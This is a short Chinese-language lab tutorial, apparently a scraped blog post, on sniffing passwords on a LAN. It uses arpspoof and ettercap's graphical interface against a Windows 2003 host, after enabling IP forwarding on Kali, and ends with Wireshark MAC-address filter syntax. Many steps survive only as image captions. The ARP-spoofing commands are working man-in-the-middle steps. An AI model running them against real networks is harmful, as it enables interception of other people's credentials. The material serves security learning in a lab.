kali 密码嗅探(arpspoof、ettercap-graphical)

一、环境

目标主机:Win2003

IP:192.168.47.123
MAC: 00:0c:29:ac:15:99

攻击机:kali

IP: 192.168.47.147
MAC: 00:0c:29:5d:9d:90

网关:

IP: 192.168.47.2
MAC: 0:50:56:ee:63:d5

二、ARP欺骗

2.1 开启 kali 路由功能

改文件(/proc/sys/net/ipv4/ip_forward)参数:
echo 1 > /proc/sys/net/ipv4/ip_forward

2.2 开始欺骗

#新版kali2020 没有预装arpspoof
arpspoof -i eth0 -t 192.168.47.123 -r 192.168.47.2
-t win2003 目标主机
-r 网关

效果是这样的:
kali 密码嗅探(arpspoof、ettercap-graphical)_第1张图片
介绍下图形界面用于欺骗的工具 ettercap-graphical
kali 密码嗅探(arpspoof、ettercap-graphical)_第2张图片
点击
kali 密码嗅探(arpspoof、ettercap-graphical)_第3张图片点击扫描
kali 密码嗅探(arpspoof、ettercap-graphical)_第4张图片kali 密码嗅探(arpspoof、ettercap-graphical)_第5张图片

可选择单项欺骗或者双向欺骗:
[这里选择双向欺骗]
将 Win2003(192.168.47.123) 添加到 Target1
将 网关(192.168.47.2) 添加到 Target2
#(到这,只是单项)
接着执行:
将 网关(192.168.47.2) 添加到 Target1
将 Win2003(192.168.47.123) 添加到 Target2

查看配置结果
kali 密码嗅探(arpspoof、ettercap-graphical)_第6张图片
kali 密码嗅探(arpspoof、ettercap-graphical)_第7张图片开始欺骗
kali 密码嗅探(arpspoof、ettercap-graphical)_第8张图片kali 密码嗅探(arpspoof、ettercap-graphical)_第9张图片
接着点击 start
kali 密码嗅探(arpspoof、ettercap-graphical)_第10张图片

三、抓包验证

kali 密码嗅探(arpspoof、ettercap-graphical)_第11张图片
在这里插入图片描述kali 密码嗅探(arpspoof、ettercap-graphical)_第12张图片

四、wireshark中根据MAC地址/物理地址过滤数据包

捕获过滤和显示过滤的语法如下:

1、wireshark捕获过滤中过滤MAC地址/物理地址
ether host 80:f6:2e:ce:3f:00 //过滤目标或源地址是80:f6:2e:ce:3f:00的数据包
ether dst host 80:f6:2e:ce:3f:00 //过滤目标地址是80:f6:2e:ce:3f:00的数据包
ether src host 80:f6:2e:ce:3f:00 //过滤源地址是80:f6:2e:ce:3f:00的数据包

2、wireshark显示过滤中过滤MAC地址/物理地址
eth.addr== 80:f6:2e:ce:3f:00 //过滤目标或源地址是80:f6:2e:ce:3f:00的数据包
eth.src== 80:f6:2e:ce:3f:00 //过滤源地址是80:f6:2e:ce:3f:00的数据包
eth.dst== 80:f6:2e:ce:3f:00 //过滤目标地址是80:f6:2e:ce:3f:00的数据包

你可能感兴趣的:(工具使用)